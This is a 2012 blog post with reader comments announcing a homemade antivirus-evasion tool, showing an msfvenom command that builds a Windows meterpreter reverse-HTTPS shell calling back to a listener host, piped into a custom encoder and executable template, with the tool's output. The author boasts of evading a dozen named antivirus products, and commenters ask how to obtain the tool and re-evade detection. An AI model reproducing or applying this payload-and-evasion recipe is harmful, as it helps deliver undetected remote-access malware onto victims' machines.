Tags
antivirus, bypass, encoder, evasion, hacking, metasploit, meterpreter, payload, pentest, security
Antivirus Sandbox Evasion (part 1) – Preview
by foip on February 28th, 2012
Hmmm, it seems that I wrote something very nice...
$ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 \
    | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe
[*ultimate] Waiting for payload from STDIN
[*ultimate] Payload: read (size: 367)
[*ultimate] Payload: encode (new size: 1161)
[*ultimate] Template: read 94720 bytes from file
[*ultimate] Template: found pattern 'MY_PAYLOAD:' at position: 36928
[*ultimate] Output: add the begin of the template (size: 36928)
[*ultimate] Output: add the encoded payload (size: 1161)
[*ultimate] Output: add the end of the template (size: 18502)
[*ultimate] File '/tmp/payload.exe' generated (size: 94720)
WTF is that? “That” is my new toy: an antivirus evasion tool which bypasses signature, heuristic and... sandbox detections ;-)
Tested on VirusTotal.com (zero detections out of 44), then on virtual machines against:
- Avast
- AVG
- BitDefender
- Kaspersky
- McAfee
- Microsoft Security Essentials
- ESET Nod32
- GData
- F-Secure
- Panda
- Sophos
- Symantec (of course)
So far so good. Let me play a bit with it. As soon as I find another (private) method, I swear to release this one...
Stay tuned ;-)
© 2012, foip. All rights reserved.
From → Hacking, Metasploit
14 Comments
Great post!!! Pls keep sharing — TKS
Hi, where can I get your ultimate-payload.pl? For testing? :P
Template work?
The Perl script uses a homemade encoder, but the important part (for sandbox evasion) is indeed in the template.
I saw on your blog that you also had fun with this exciting challenge ;-)
Cheers.
Well done, that’s a good job. Friend, where are we to insert the payload? Is it at the DOS command prompt, or at config.sys, or Metasploit, or other?
I can’t execute the line of code below on BackTrack 5; problem with ultimate-payload.pl.
Can you help me please?
You should keep it private. As soon as you release it, it will be added to AV databases.
;-)
Virustotal 10/42!!!!!!!
Thank you for this update. Glad to see that AV vendors are working...
Since the tool has been released, the score can’t stay eternally at 0/42...
If you want to reach 0/42 again, use your imagination ;)
Hi
Payloads created with your template are now detected by antiviruses:
Vendor               Detection                                        Update
---------------------------------------------------------------------------
Agnitum              Backdoor.Swrort!Ar5xwgxMbks                      20121008
Avast                Win32:Malware-gen                                20121008
AVG                  Generic28.CKZJ                                   20121008
BitDefender          Trojan.Generic.KDV.673845                        201210078191
Emsisoft             Trojan.Win32.Swrort!IK                           20120919
F-Secure             Trojan.Generic.KDV.673845                        20121003
Fortinet             W32/Crypt.BBCR!tr                                20121008
GData                Trojan.Generic.KDV.673845                        20121009
Ikarus               Trojan.Win32.Swrort                              20121008
Jiangmin             Backdoor/Bifrose.xur                             20121008
Kaspersky            HEUR:Trojan.Win32.Generic                        20121009
Kingsoft             VIRUS_UNKNOWN                                    20121008
                     Heuristic.BehavesLike.Win32.Suspicious-BAY.K     20121008
Microsoft            Trojan:Win32/Swrort.A                            20121009
MicroWorld-eScan     Trojan.Generic.KDV.673845                        20121009
nProtect             Trojan/W32.Agent.117248.CS                       20121008
TrendMicro-HouseCall –                                                20121008
VBA32                Backdoor.Swrort.pt                               20121008
VIPRE                BehavesLike.Win32.Malware.bsf (vs)               20121008
---------------------------------------------------------------------------
Can you tell me how I can edit it to prevent antivirus detection?
Thanks.
Nice work, thanks!
Very nice, but the worst thing you did was upload it to VirusTotal. Always test in a virtual machine and with multiple AVs.
;-)
I know. But managing 44 AVs on virtual machines was a bit too much for me. When I find that my code works as expected, I keep the concept and start a new one.
Thanks for reading and commenting! Cheers.